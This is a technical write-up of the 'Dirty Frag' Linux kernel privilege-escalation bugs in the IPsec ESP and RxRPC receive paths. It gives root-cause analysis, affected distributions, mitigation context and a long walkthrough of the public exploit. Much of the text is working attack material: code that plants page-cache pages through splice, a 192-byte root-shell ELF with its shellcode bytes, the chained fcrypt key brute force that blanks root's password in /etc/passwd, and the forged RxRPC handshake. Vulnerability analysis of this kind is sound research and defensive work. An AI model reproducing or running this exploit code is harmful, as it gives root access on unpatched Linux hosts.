Background — Dirty Frag and the "Dirty" Lineage

The Plain-English Summary

The Linux kernel keeps file contents in RAM (the page cache) so it does not have to re-read from disk on every access. Dirty Frag is a class of vulnerabilities where an unprivileged attacker can silently overwrite selected bytes of that in-RAM copy for any file they can read, without ever touching the on-disk copy and without setting the dirty flag that would cause it to be detected or flushed.

In the xfrm-ESP variant, the attacker uses the IPsec subsystem's esp_input() receive path to achieve a precise 4-byte write at an attacker-controlled offset in any readable file's page cache. In the RxRPC variant, they use the AFS/RxRPC networking stack's packet verification path to achieve an 8-byte write via a brute-force key search. By repeating either write primitive across a target binary, the attacker injects shellcode that runs as root.

Critical — Embargo Broken Dirty Frag was reported to kernel security on April 29–30, 2026 by Hyunwoo Kim (@v4bel). An embargo of 5 days was set with distribution maintainers on May 7, 2026. That same day, a third party independently published the full xfrm-ESP exploit publicly, breaking the embargo. The researcher and distro maintainers then agreed to full public disclosure immediately. As of May 8, 2026: the xfrm-ESP patch is merged mainline (commit f4c50a4034e6), but the RxRPC patch has no upstream merge yet, and no distribution has shipped either fix through standard update channels.

Affected Systems at a Glance

The xfrm-ESP vulnerability was introduced in kernel commit cac2661c53f3 (January 2017), making kernels from approximately v4.9 through the present vulnerable. The RxRPC vulnerability was introduced in commit 2dc334f1a63a (June 2023) and only affects kernels from that point forward. Together, the dual-chain exploit covers essentially every unpatched Linux kernel in the wild today. Either one or both variants apply depending on the distro and kernel configuration.

SystemESP VariantRxRPC VariantChain Result
Ubuntu 22.04 / 24.04VulnerableVulnerable (rxrpc built-in)Root via either path
RHEL 10 / CentOS Stream 10VulnerableNot affected (no rxrpc.ko)Root via ESP only
AlmaLinux 8VulnerableNot affected (no rxrpc.ko)Root via ESP only
Fedora 44VulnerableDepends on build configRoot via ESP
openSUSE TumbleweedVulnerableNo rxrpc.koRoot via ESP only
Ubuntu with AppArmor user-ns blockBlocked (no CAP_NET_ADMIN)Vulnerable (no unshare needed)Root via RxRPC
AndroidNot affectedNot affectedNot vulnerable
gVisor containersNot affectedNot affectedNot vulnerable
AWS Fargate / FirecrackerIsolated per-VM kernelIsolated per-VM kernelNot vulnerable

How Copy Fail and Dirty Frag Relate

Copy Fail (CVE-2026-31431) and Dirty Frag's ESP variant share the same sink — the scatterwalk_map_and_copy() call inside crypto_authenc_esn_decrypt() that performs a 4-byte scratch write during Extended Sequence Number rearrangement. The difference is in the source path that lands attacker-controlled pages there: Copy Fail uses the AF_ALG userspace crypto socket, while Dirty Frag's ESP variant goes through the normal IPsec receive path via esp_input(). They are two different roads to the same dangerous intersection.

This distinction is critical. Copy Fail's mitigation, blacklisting the algif_aead kernel module, shuts the AF_ALG door. It does absolutely nothing to the esp_input() path, which lives in a completely different part of the kernel. Every system that applied the Copy Fail mitigation and thought it was protected is still fully exposed to Dirty Frag.

Your Copy Fail Mitigation Is Not Enough If you blacklisted algif_aead after Copy Fail, you have not protected yourself from Dirty Frag. The two exploits use different kernel entry points. You must apply the Dirty Frag mitigations separately.

Key Concepts — splice(), sk_buff Frags, and In-Place Crypto

To understand both variants, you need to understand how three kernel facilities interact in ways their designers never intended to be combined.

splice() and Zero-Copy Semantics

Normally, when a program reads a file and sends it over a network, the data has to travel: disk → kernel page cache → a copy in userspace → back into the kernel's network buffers. splice() short-circuits this: it moves data directly between two kernel file descriptors — for example, from a file directly into a pipe, or from a pipe into a socket — without ever copying bytes through userspace.

The key detail: when you splice() a file into a pipe, the kernel doesn't copy the file's bytes. It hands the pipe a reference — a pointer — to the same physical memory page already sitting in the page cache. The pipe now holds a reference to the exact same page the kernel uses to represent the file in RAM. When that pipe is then spliced into a socket, those page references travel through the network stack still attached to the original page cache memory. Internally, they end up embedded in a kernel network packet structure (struct sk_buff) as "frag" entries — pointers into pages the attacker originally only had read access to.

struct sk_buff and Nonlinear Data

Every network packet the Linux kernel processes is wrapped in a structure called struct sk_buff (socket buffer). A packet's payload can live in two places: a contiguous block of private kernel memory (the "linear" area), or spread across a list of external page fragments (the "frag" array) when zero-copy paths like splice() are used.

The distinction matters enormously here. Pages in the frag array via splice() are shared — the kernel network stack doesn't own them exclusively; they are still the same physical pages backing the original file in the page cache. After the Dirty Frag patch, the kernel marks these with an SKBFL_SHARED_FRAG flag. Before the patch, some receive paths — specifically the IPsec ESP and RxRPC paths — never checked whether the frags they were about to decrypt in-place were privately owned or externally shared.

In-Place Crypto: The Root of Both Bugs

When the kernel encrypts or decrypts data, it needs an input buffer (ciphertext) and an output buffer (plaintext). Allocating two separate buffers costs memory and time. An optimization called in-place crypto reuses the same buffer for both: it reads the ciphertext, decrypts it, and writes the plaintext back into the exact same memory location. This is completely safe — as long as that memory is a private kernel buffer that nobody else can see.

The bug: when the buffer being decrypted in-place is actually a page cache page planted there via splice(), "writing the plaintext back" means writing into the file's in-RAM copy. The kernel has just used its own crypto engine to overwrite bytes in a file the attacker was only allowed to read. The on-disk file is never touched. The dirty flag is never set. The change is invisible to every tool that looks at the disk.

The Shared Pattern Behind Both Variants Both Dirty Frag variants follow the same three-step blueprint: (1) use splice(file → pipe → socket) to plant a page cache page reference into a network packet's frag slot; (2) trigger a kernel receive path that performs in-place crypto on the packet payload without first making a private copy; (3) the decrypt operation writes attacker-influenced bytes directly into the file's page cache. The on-disk file is untouched. The change survives until the page is evicted or the cache is explicitly dropped.

Variant 1: xfrm-ESP Page-Cache Write (CVE-2026-43284)

Root Cause — The skb_cow_data Bypass

The IPsec ESP receive function esp_input() is responsible for decrypting incoming ESP-encapsulated packets. Before performing in-place AEAD decryption, it should call skb_cow_data() to allocate a private copy of any nonlinear data if the skb is "cloned" (shared). However, the function contains an optimization branch that skips this copy when conditions appear safe:

Cnet/ipv4/esp4.c — vulnerable branch
static int esp_input(struct xfrm_state *x, struct sk_buff *skb)
{
    [...]
    if (!skb_cloned(skb)) {
        if (!skb_is_nonlinear(skb)) {
            nfrags = 1;
            goto skip_cow;
        } else if (!skb_has_frag_list(skb)) {
            nfrags = skb_shinfo(skb)->nr_frags;
            nfrags++;
            goto skip_cow;  /* ← BUG: skips copy for frags! */
        }
    }
    /* Normal safe path — allocates private copy */
    err = skb_cow_data(skb, 0, &trailer);
    [...]

The logic checks: "is the skb non-cloned AND does it have frags but no frag_list?" If so, skip the cow. The reasoning was that a non-cloned skb with simple frags is safe to modify in-place. What the code failed to account for is that those frags may be externally shared pages planted by splice() — which are not cloned in the skb_cloned() sense, but are absolutely not private kernel memory.

The 4-Byte Write Primitive

Once the cow bypass is triggered, esp_input() calls crypto_authenc_esn_decrypt() on an skb whose frags contain attacker-pinned page cache pages. That function performs Extended Sequence Number rearrangement by writing 4 bytes to a specific location in the destination scatter-gather list — before HMAC authentication is verified:

Ccrypto/authencesn.c — pre-auth 4-byte STORE
static int crypto_authenc_esn_decrypt(struct aead_request *req)
{
    [...]
    /* Move high-order bits of sequence number to the end. */
    scatterwalk_map_and_copy(tmp, src, 0, 8, 0);
    if (src == dst) {
        scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
        scatterwalk_map_and_copy(tmp + 1, dst,
                                   assoclen + cryptlen, 4, 1); /* ← STORE at attacker-chosen offset */
    }
    [...]
    /* HMAC verification happens HERE — after the STORE — and fails with EBADMSG */
    /* But the page cache modification already happened and is not rolled back */

The 4 bytes written come from tmp + 1 — which holds the high 32 bits of the sequence number from the SA's replay_esn->seq_hi field. The attacker registers the SA via netlink with an arbitrary seq_hi value. The write offset is assoclen + cryptlen, where cryptlen is chosen by the attacker to equal the target file offset. The attacker has full control over both the value written and where it lands.

SA Registration Requires CAP_NET_ADMIN — But User Namespaces Grant It Unlike Copy Fail's AF_ALG entry point which any user can open, registering an XFRM Security Association requires the CAP_NET_ADMIN capability — normally a root-only privilege. However, Linux user namespaces let any unprivileged user call unshare(CLONE_NEWUSER | CLONE_NEWNET) to create a sandboxed "bubble" where they appear as root and hold all capabilities, including CAP_NET_ADMIN, but only within that bubble. The host OS sees none of it. The exploit creates this sandbox for SA registration only; the actual page-cache write affects the real host. Ubuntu's default AppArmor policy blocks this unshare() call — which is exactly why the RxRPC fallback variant exists.

Exploit Flow — ELF Injection into /usr/bin/su

The ESP exploit takes the same approach as Copy Fail: overwrite the first 192 bytes of /usr/bin/su's page cache with a minimal 192-byte ELF that calls setgid(0); setuid(0); setgroups(0, NULL); execve("/bin/sh", ...). The 192 bytes are split into 48 chunks of 4 bytes each, written one at a time via the 4-byte STORE primitive.

1

Unshare into a new user+net namespace

unshare(CLONE_NEWUSER | CLONE_NEWNET) gives the child root inside the new namespace. Identity UID/GID maps are written, and loopback is brought up. This gives CAP_NET_ADMIN for XFRM SA registration.

2

Register 48 XFRM Security Associations

One SA per 4-byte chunk. Each SA uses authencesn(hmac(sha256), cbc(aes)) with UDP encapsulation (port 4500), XFRM_STATE_ESN flag, and the desired 4-byte shellcode value placed in XFRMA_REPLAY_ESN_VAL.seq_hi. The HMAC/AES keys are arbitrary — authentication will fail anyway.

3

For each 4-byte chunk: splice + send

A forged ESP wire header (SPI + seq_no + IV) is written into a pipe via vmsplice. Then 16 bytes of /usr/bin/su at offset i×4 are spliced into the pipe — planting the page cache page reference into the frag. The pipe is then spliced to a UDP socket connected to the local port with UDP_ENCAP_ESPINUDP set, sending the packet over loopback.

4

Kernel receive path triggers the STORE

The packet is routed: udp_rcv → xfrm4_udp_encap_rcv → xfrm_input → esp_input. The vulnerable skip_cow branch is taken (non-cloned, has frag, no frag_list). The crypto_authenc_esn_decrypt call writes seq_hi into the page cache at offset i×4. HMAC returns EBADMSG — but the write already happened.

5

Execute the modified binary

After 48 iterations, the full ELF payload is assembled in /usr/bin/su's page cache. The parent process (real UID) calls forkpty + execve("/usr/bin/su", "-"). The setuid-root bit is intact on disk, so the kernel runs the binary as root — but loads it from the corrupted cache. Root shell drops.

Cexp.c — one chunk trigger (simplified)
/* Forged ESP wire header: SPI(4) + seq_lo(4) + IV(16) */
uint8_t hdr[24];
*(uint32_t *)(hdr + 0) = htonl(spi);       /* per-chunk SPI */
*(uint32_t *)(hdr + 4) = htonl(100);        /* seq_lo */
memset(hdr + 8, 0xCC, 16);                  /* IV (value irrelevant) */

/* Plant page cache page P of /usr/bin/su into the pipe */
vmsplice(pfd[1], &(struct iovec){hdr, 24}, 1, 0);
splice(file_fd, &(off_t){i*4}, pfd[1], NULL, 16, SPLICE_F_MOVE);

/* Send pipe → socket: MSG_SPLICE_PAGES auto-set, page stays as frag */
splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);

/* esp_input() takes skip_cow branch → authencesn_decrypt writes seq_hi at offset i*4
   EBADMSG returned but write is permanent — page cache modified */

Variant 2: RxRPC Page-Cache Write (CVE-2026-43500)

Root Cause — In-Place pcbc(fcrypt) Decrypt on Spliced Frags

RxRPC is the Linux kernel's implementation of the AFS (Andrew File System) RPC transport protocol. When a connection uses RXKAD security at the RXRPC_SECURITY_AUTH level, incoming data packets are verified by rxkad_verify_packet_1(), which performs an in-place 8-byte decrypt using pcbc(fcrypt) — the classic AFS cipher — to validate packet integrity.

Cnet/rxrpc/rxkad.c — vulnerable in-place decrypt
static int rxkad_verify_packet_1(struct rxrpc_call *call,
                                  struct sk_buff *skb, ...)
{
    [...]
    sg_init_table(sg, ARRAY_SIZE(sg));
    ret = skb_to_sgvec(skb, sg, sp->offset, 8); /* converts frags to SGL */

    memset(&iv, 0, sizeof(iv));
    skcipher_request_set_crypt(req, sg, sg, 8, iv.x); /* src == dst: IN-PLACE */
    ret = crypto_skcipher_decrypt(req); /* 8-byte STORE directly into frag */

    /* If frag is a page cache page (planted via splice): 
       8 bytes written into that file's in-RAM copy */

The code preceding this function (call_event.c:337) only unshares the skb if skb_cloned(skb) is true. A non-linear skb with page cache pages in its frags via splice() is not cloned in that sense, so it bypasses the copy and hits the in-place decrypt path directly.

The 8-Byte Brute-Forced Write Primitive

Unlike the ESP variant's clean 4-byte arbitrary write, the RxRPC variant provides a more constrained primitive: the 8 bytes written into the page cache are fcrypt_decrypt(C, K) — the result of decrypting the 8-byte ciphertext C (currently at the target file offset) with key K (the attacker's RxRPC session key).

The attacker controls K via add_key("rxrpc", ...), which requires no privileges at all. Since fcrypt is a deterministic public algorithm with a 56-bit key space, and because the IV is zero and only one 8-byte block is decrypted, pcbc(fcrypt) reduces to a single fcrypt_decrypt(C, K) call with no chaining. The attacker can therefore brute-force the desired plaintext in userspace: iterate over candidate keys K until fcrypt_decrypt(C, K) produces the bytes they want to plant. This sounds expensive, but the target bytes only need to satisfy loose conditions — not all 8 bytes are fully constrained — making the search tractable. A userspace port of crypto/fcrypt.c runs at ~18 million keys/second, completing each search in well under 1 second.

No CAP_NET_ADMIN Required This is the key advantage of the RxRPC variant over the ESP variant. add_key("rxrpc", ...), socket(AF_RXRPC), and splice() are all available to completely unprivileged users. No user namespace creation is needed. On Ubuntu, where AppArmor blocks unshare(CLONE_NEWUSER) by default, the RxRPC variant is the path to root.

Exploit Flow — /etc/passwd Nulling

Writing an arbitrary static ELF via 8-byte brute-force is impractical (full 56-bit key space with all 8 bytes constrained). So the RxRPC exploit targets a more achievable goal: null the passwd field of root's entry in /etc/passwd line 1, turning it from root:x:0:0:... into root::0:0:.... PAM's pam_unix.so with the nullok option then accepts an empty password for root — letting su succeed without any credential.

The target: chars 4–15 of /etc/passwd line 1 must become ::0:0:GGGGGG:. Only 12 bytes need to be decided, and 5 of those (the fill chars at positions 10–14) just need to be any printable non-colon character — a weak enough constraint to make the brute force feasible in milliseconds.

Three overlapping 8-byte STOREs with last-write-wins semantics accomplish this:

Text/etc/passwd line 1 — before and after
File offset:  0 1 2 3 4  5 6 7 8 9 10 11 12 13 14 15
Original:     r o o t :  x : 0 : 0  :  r  o  o  t  :

splice A @ offset 4  (8B) → writes chars 4..11
splice B @ offset 6  (8B) → writes chars 6..13  (overwrites 6..11 from A)
splice C @ offset 8  (8B) → writes chars 8..15  (overwrites 8..13 from B)

Result:       r o o t :  : 0 : 0 :  G  G  G  G  G  :
              └──────────────────────────────────────┘
              root::0:0:GGGGG:/root:/bin/bash  ← empty passwd, PAM nullok passes

For each STORE, a userspace brute-force search finds the RxRPC key K such that fcrypt_decrypt(C, K) == desired_plaintext. The ciphertext seen by each subsequent splice is the plaintext left by the previous STORE — so the brute forces must be chained, each accounting for the mutation left by the last. A user-space port of crypto/fcrypt.c running at ~18 million keys/second completes each search in under 1 second.

After all three STOREs, the parent process calls forkpty + execve("/usr/bin/su", "-"). PAM reads the modified /etc/passwd from page cache, sees an empty password field, and with nullok grants the login without a password prompt. su performs setresuid(0, 0, 0) and drops into /bin/bash as root.


Why Chaining? Covering Each Other's Blind Spots

Neither variant works universally on its own. The ESP variant requires CAP_NET_ADMIN — achievable via user namespaces, but Ubuntu's default AppArmor policy blocks unprivileged unshare(CLONE_NEWUSER). The RxRPC variant requires no privileges, but rxrpc.ko is not included in most enterprise distributions (RHEL, CentOS, AlmaLinux ship without it). Together, they cover the full distribution landscape:

// ESP Variant (CVE-2026-43284)

xfrm-ESP Page-Cache Write

  • 4-byte arbitrary STORE, fully controlled value and offset
  • Writes 192-byte ELF into /usr/bin/su page cache
  • Needs unshare(CLONE_NEWUSER|NEWNET) in a child process
  • Blocked by Ubuntu AppArmor user-ns policy by default
  • Works on RHEL, Fedora, CentOS, openSUSE, AlmaLinux
  • Wall-clock cost: ~7 seconds (48 writes x 150ms sleep each)
  • Patched: mainline commit f4c50a4034e6
// RxRPC Variant (CVE-2026-43500)

RxRPC Page-Cache Write

  • 8-byte brute-forced STORE via userspace fcrypt key search
  • Nulls password field in /etc/passwd root entry
  • Zero privileges required, no namespace creation needed
  • Requires rxrpc.ko to be present and loadable
  • Works on Ubuntu (rxrpc.ko built and loadable by default)
  • No upstream patch merged as of May 8, 2026

The combined exploit logic tries ESP first. If it succeeds, the parent process confirms by checking the 8-byte marker in /usr/bin/su's page cache and then runs su - to get a root shell through the injected ELF. If the ESP attempt fails, for example because unshare() returned EPERM, or because esp4.ko is absent, the exploit falls back to the RxRPC path and nulls the root password field in /etc/passwd instead.

One Binary. Every Major Distro. Under One Second. The public exp.c is a single C file. Compiled with gcc -O0 -Wall -o exp exp.c -lutil, it runs the full chain automatically, selects the appropriate variant, and delivers a root shell on Ubuntu, RHEL, Fedora, openSUSE, CentOS, and AlmaLinux. No kernel symbols. No heap grooming. No timing windows.
Post-Exploit Cleanup Required Unlike Copy Fail, Dirty Frag leaves the page cache in a contaminated state after exploitation — the modified pages persist even if the exploit exits. On systems where this matters (production hosts), you must run echo 3 > /proc/sys/vm/drop_caches or reboot after exploitation to restore correct file contents. From a forensics perspective this means the in-memory evidence is easily wiped while the on-disk files remain untouched.

PoC Deep Dive — Reading exp.c

The public exploit (exp.c, 1951 lines, C) is a single self-contained file that implements both attack variants plus the chaining logic. There is no Python, no scripting, no compiled kernel module — just a standard C binary linked against -lutil for the PTY helper. Let's walk through exactly what it does, function by function.

Top-Level Structure and the Chain Logic

The binary is a single C file (~1951 lines) with three logical sections compiled together: su_lpe_main() for the ESP/xfrm path targeting /usr/bin/su, rxrpc_lpe_main() for the RxRPC path targeting /etc/passwd, and main() which chains them. The chaining logic is more sophisticated than a simple fallback — it checks whether either target is already patched before deciding what to run, and retries the RxRPC path up to 3 times:

Cexp.c — main() chain logic (actual code)
/* If already running as root somehow, just exec bash */
if (getuid() == 0) { execlp("/bin/bash", "bash", NULL); }

/* Append "--corrupt-only" to argv for both sub-mains */
co_argv = append_corrupt_only(argc, argv, &new_argc);

if (!verbose) silence_stderr(&saved_err); /* suppress noise by default */

if (force_rxrpc) {
    /* --force-rxrpc: only try RxRPC path, up to 3 retries */
    rc = rxrpc_lpe_main(new_argc, co_argv);
    for (int i = 0; !passwd_already_patched() && i < 3; i++)
        rc = rxrpc_lpe_main(new_argc, co_argv);
} else if (force_esp) {
    /* --force-esp: only try ESP path */
    rc = su_lpe_main(new_argc, co_argv);
} else {
    /* Default: try ESP first */
    rc = su_lpe_main(new_argc, co_argv);
    if (!su_already_patched()) {
        /* ESP didn't land — fall back to RxRPC, retry up to 3× */
        rc = rxrpc_lpe_main(new_argc, co_argv);
        for (int i = 0; !passwd_already_patched() && i < 3; i++)
            rc = rxrpc_lpe_main(new_argc, co_argv);
    }
}

if (!verbose) restore_stderr(saved_err);

/* If either target is patched, open a root PTY via /usr/bin/su */
if (either_target_patched()) {
    run_root_pty(); /* spawns `su -` in fresh PTY, bridges tty */
    return 0;
}

Two helper functions check whether either target has been successfully poisoned. They work because pread() on a file whose page cache was modified reads the in-memory version — the on-disk file is untouched:

Cexp.c — success detection helpers
/* Check if /usr/bin/su page cache contains our injected shellcode.
   Looks for the 8 bytes at offset 0x78: 31 ff 31 f6 31 c0 b0 6a
   = "xor edi,edi; xor esi,esi; xor eax,eax; mov al,0x6a(setgid)"
   These bytes are unique to our payload — the real su never has them. */
static const uint8_t su_marker[8] = {
    0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0, 0xb0, 0x6a
};
static int su_already_patched(void) {
    int fd = open("/usr/bin/su", O_RDONLY);
    uint8_t got[8];
    pread(fd, got, 8, 0x78);  /* reads from page cache, not disk */
    return memcmp(got, su_marker, 8) == 0;
}

/* Check if /etc/passwd root entry starts with "root::0:0" — empty passwd */
static int passwd_already_patched(void) {
    int fd = open("/etc/passwd", O_RDONLY);
    char head[16];
    pread(fd, head, 16, 0);
    return memcmp(head, "root::0:0", 9) == 0;
}

The final stage — common to both paths — is run_root_pty(). It opens a PTY pair with posix_openpt(), forks a child that execs su - with the slave PTY as its stdin/stdout/stderr, and bridges the parent's terminal to the master side. If PAM prompts for a password (which it will in the RxRPC path since pam_unix.so nullok still shows a prompt on some configs), the bridge auto-injects a single newline — the empty password that the patched /etc/passwd entry now accepts. By default, all stderr output from the sub-mains is suppressed with silence_stderr(), making the exploit appear to the user as a clean single command that produces a root shell.

Why pread() reveals the page cache modification After either variant runs, pread() on the target file reads from the page cache — the kernel's in-memory copy — not from disk. The exploit never sets the dirty flag, so the on-disk file is identical to before. But the in-memory copy reflects the STORE that happened. This is the same property that makes the attack invisible to file integrity tools, and here the exploit exploits it again to check its own success.

The Injected ELF Payload

The 192-byte shell_elf[] array embedded in the binary is a fully valid, self-contained x86-64 ELF executable. It is not shellcode bolted onto a template — it is a minimal but correct ELF with a real header and a PT_LOAD program header. Here is what it does:

  • ELF header (64 bytes): e_type=ET_EXEC, e_machine=EM_X86_64, entry point at virtual address 0x400078
  • PT_LOAD segment (56 bytes): maps file bytes 0..0xb7 to virtual address 0x400000, flags R+X (readable and executable)
  • Shellcode (40 bytes at file offset 0x78 = vaddr 0x400078): calls setgid(0), setuid(0), setgroups(0, NULL), then execve("/bin/sh", NULL, envp) where envp = ["TERM=xterm", NULL]
  • String data: "TERM=xterm\0" at offset 0xa5 and "/bin/sh\0" at offset 0xb0

The TERM=xterm environment variable is intentionally set — without it, /etc/bash.bashrc and similar shell init scripts emit "No value for $TERM" errors that would clutter the root shell output.

Because /usr/bin/su has its setuid-root bit set on disk (the exploit never touches the disk), the kernel runs this injected ELF with effective UID 0 (root). The ELF's shellcode then locks in root with setuid(0)/setgid(0) and spawns /bin/sh.

asmshellcode at ELF offset 0x78 (entry point 0x400078)
; syscall numbers: setgid=0x6a(106), setuid=0x69(105), setgroups=0x74(116), execve=0x3b(59)
31 ff          xor    edi, edi           ; arg0 = 0
31 f6          xor    esi, esi
31 c0          xor    eax, eax
b0 6a          mov    al, 0x6a           ; setgid(0)
0f 05          syscall
b0 69          mov    al, 0x69           ; setuid(0)
0f 05          syscall
b0 74          mov    al, 0x74           ; setgroups(0, NULL)
0f 05          syscall
6a 00          push   0               ; envp[1] = NULL sentinel
48 8d 05 12 00 00 00  lea rax,[rip+0x12]  ; rax → "TERM=xterm\0" at 0xa5
50             push   rax             ; envp[0] = "TERM=xterm"
48 89 e2       mov    rdx, rsp        ; rdx = envp[]
48 8d 3d 12 00 00 00  lea rdi,[rip+0x12]  ; rdi → "/bin/sh\0" at 0xb0
31 f6          xor    esi, esi        ; rsi = NULL (argv)
6a 3b          push   0x3b
58             pop    rax             ; rax = 59 (execve)
0f 05          syscall             ; execve("/bin/sh", NULL, ["TERM=xterm",NULL])

ESP Variant: setup_userns_netns() and add_xfrm_sa()

corrupt_su() first calls setup_userns_netns(), which creates the user+net namespace sandbox. This is where CAP_NET_ADMIN is acquired. The UID map written is "0 <real_uid> 1" — meaning inside this namespace, real UID 1000 (or whatever your UID is) maps to UID 0. Loopback is brought UP with SIOCSIFFLAGS because the exploit routes packets over loopback, and loopback is DOWN by default in a fresh netns.

Then all 48 XFRM SAs are registered upfront in one batch before any trigger fires — one SA per 4-byte chunk of shell_elf[]. Each SA has a unique SPI (0xDEADBE10 + i) and carries the chunk value in esn->seq_hi packed as a big-endian uint32_t:

Cexp.c — packing shellcode chunk into seq_hi (big-endian)
for (int i = 0; i < PAYLOAD_LEN / 4; i++) {  /* 48 iterations */
    uint32_t spi     = 0xDEADBE10 + i;
    uint32_t seqhi   =
        ((uint32_t)shell_elf[i*4 + 0] << 24) |  /* most-significant byte first */
        ((uint32_t)shell_elf[i*4 + 1] << 16) |
        ((uint32_t)shell_elf[i*4 + 2] <<  8) |
        ((uint32_t)shell_elf[i*4 + 3]);
    add_xfrm_sa(spi, seqhi);  /* registers SA via NETLINK_XFRM */
}

Inside add_xfrm_sa(), a raw NETLINK_XFRM socket sends an XFRM_MSG_NEWSA message. The SA configuration is: protocol IPPROTO_ESP, transport mode, XFRM_STATE_ESN flag set, algorithm hmac(sha256) + cbc(aes) with arbitrary keys (0xAA and 0xBB filled), UDP encapsulation on port 4500, and the replay state with seq_hi = patch_seqhi (the shellcode chunk). The HMAC and AES keys are arbitrary because HMAC verification will always fail — that's by design.

ESP Variant: do_one_write() — The Write Trigger

For each of the 48 chunks, do_one_write() fires the actual kernel-side write. This is the most important function in the ESP path. It:

Cexp.c — do_one_write() annotated
/* 1. sk_recv: UDP socket on 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP.
      Any UDP packets arriving here that look like ESP are redirected
      into xfrm_input() → esp_input() by the kernel automatically. */
int sk_recv = socket(AF_INET, SOCK_DGRAM, 0);
bind(sk_recv, &sa_d, ...);         /* 127.0.0.1:4500 */
setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, UDP_ENCAP_ESPINUDP, ...);

/* 2. sk_send: a regular UDP socket connected to 127.0.0.1:4500.
      Sending here delivers to sk_recv over loopback. */
int sk_send = socket(AF_INET, SOCK_DGRAM, 0);
connect(sk_send, &sa_d, ...);

/* 3. Build the forged ESP wire header in a local buffer.
      Format: [SPI: 4B] [seq_lo: 4B] [IV: 16B] = 24 bytes total.
      SEQ_VAL = 200 (hardcoded). IV is 0xCC-filled (value irrelevant —
      authentication fails anyway). */
uint8_t hdr[24];
*(uint32_t*)(hdr + 0) = htonl(spi);      /* this chunk's SPI */
*(uint32_t*)(hdr + 4) = htonl(SEQ_VAL);  /* SEQ_VAL = 200 */
memset(hdr + 8, 0xCC, 16);              /* AES-CBC IV */

/* 4. vmsplice: put the 24-byte header into the pipe's write end.
      The data lives in user-space (local array), so this is a normal
      copy into the pipe buffer. */
vmsplice(pfd[1], &iov_h, 1, 0);

/* 5. splice: move 16 bytes of /usr/bin/su starting at byte (i*4) into
      the pipe. CRITICAL: 'off' is passed as a pointer so the kernel
      uses it as the file offset. This is a zero-copy operation — the
      pipe now holds a reference to the actual page cache page of
      /usr/bin/su, not a copy of its bytes. */
off_t off = offset;   /* = PATCH_OFFSET + i*4 */
splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE);

/* 6. splice: move the pipe contents (24+16 = 40 bytes) into sk_send.
      splice() to a socket automatically sets MSG_SPLICE_PAGES, which
      tells the kernel to keep the page-cache page as a frag in the
      skb rather than copying it. The page is now in skb->frags[0]. */
splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);

/* 7. Wait 150ms. The kernel routes the packet over loopback to sk_recv,
      which sees it as a UDP-encapsulated ESP packet and calls esp_input().
      The sleep ensures the kernel has processed the packet before we
      close the file descriptor and the pipe. */
usleep(150 * 1000);

/* fds closed. The page cache of /usr/bin/su at byte (i*4) now holds
   the 4 bytes from shell_elf[i*4..i*4+3]. The on-disk file is unchanged.
   EBADMSG was returned inside esp_input() but the STORE already happened. */
The 150ms sleep — not truly race-free The write-up calls this "deterministic" because there is no data race (no concurrent threads fighting over the same memory). However, do_one_write() does include a usleep(150ms) after the final splice(). This sleep exists to give the kernel time to deliver the packet through the loopback stack and trigger esp_input() before the pipe and socket file descriptors are closed. "Deterministic" means the outcome is predictable and reproducible, not that timing is irrelevant.

RxRPC Variant: Key Setup and Fake Handshake

The RxRPC path does not use unshare() by default. Looking at the actual code, rxrpc_lpe_main() only calls do_unshare_userns_netns() if the environment variable POC_UNSHARE=1 is explicitly set — it is opt-in, not default. The path operates entirely with normal user privileges. The exploit first opens a dummy socket(AF_RXRPC, SOCK_DGRAM, PF_INET) and closes it immediately — this sole purpose is to trigger the kernel to autoload the rxrpc.ko module via the MODULE_ALIAS_NETPROTO(PF_RXRPC) alias. Without this step, subsequent add_key("rxrpc", ...) calls fail with ENODEV because the kernel's "rxrpc" key type is registered only when the module loads.

The exploit then mmaps the first page of /etc/passwd with MAP_SHARED | PROT_READ. This keeps the page cache page pinned in memory throughout the exploit and also lets the code verify the result after triggering by reading from the mmap pointer directly — which reflects the live in-memory state, not a cached fd read.

The setup involves four cooperating pieces per trigger:

  • RxRPC key (add_key("rxrpc", desc, token, len, KEY_SPEC_PROCESS_KEYRING)): a fake AFS/Kerberos v1 token with the cell name "evil", sec_ix=2 (RXKAD), and the 8-byte brute-forced key K placed in the session_key field. Each trigger gets a unique key name ("evil0", "evil1", "evil2") to avoid stale state. After the trigger fires the key is explicitly invalidated with keyctl(KEYCTL_INVALIDATE, key).
  • Fake server: a plain socket(AF_INET, SOCK_DGRAM) bound to 127.0.0.1:port_S. Ports rotate as 7777 + (trigger_seq * 2 % 200) to avoid TIME_WAIT collisions.
  • AF_RXRPC client: socket(AF_RXRPC, SOCK_DGRAM, PF_INET) configured with the attack key via RXRPC_SECURITY_KEY and RXRPC_MIN_SECURITY_LEVEL = RXRPC_SECURITY_AUTH (1).
  • AF_ALG pcbc(fcrypt) socket: used purely in userspace to precompute the wire cksum field that the forged DATA packet must carry to pass the first verification gate in rxkad_verify_packet() before reaching the vulnerable in-place decrypt in rxkad_verify_packet_1().

The handshake sequence is:

Cexp.c — do_one_trigger() handshake flow
/* Step 1: client initiates RPC call → sends a DATA packet to port_S */
rxrpc_client_initiate_call(rxsk_cli, port_S, svc_id, 0xDEAD);

/* Step 2: fake server receives the client's initial packet, extracts
   the session identifiers (epoch, cid, callNumber) needed to forge
   a valid-looking reply later. */
udp_recv_to(udp_srv, pkt, sizeof(pkt), &cli_addr, 1500);
epoch  = ntohl(whdr_in->epoch);
cid    = ntohl(whdr_in->cid);
callN  = ntohl(whdr_in->callNumber);

/* Step 3: fake server sends a CHALLENGE packet (type=6, RXKAD security).
   nonce=0xDEADBEEF, min_level=1 (RXRPC_SECURITY_AUTH).
   The client's kernel RxRPC stack processes this automatically and
   sends back a RESPONSE containing K encrypted under the session key.
   This also causes the client's conn->rxkad.cipher to be initialised
   with K, which is what we need for the verify path. */
challenge.hdr.type = RXRPC_PACKET_TYPE_CHALLENGE;  /* 6 */
challenge.hdr.securityIndex = 2;                    /* RXKAD */
challenge.ch.nonce = htonl(0xDEADBEEFu);
sendto(udp_srv, &challenge, sizeof(challenge), ...);

/* Step 4: drain the RESPONSE (we don't verify it — we have no real
   ticket). The connection is now live and secured with K. */
udp_recv_to(udp_srv, pkt, sizeof(pkt), &src, 500); /* ×4 */

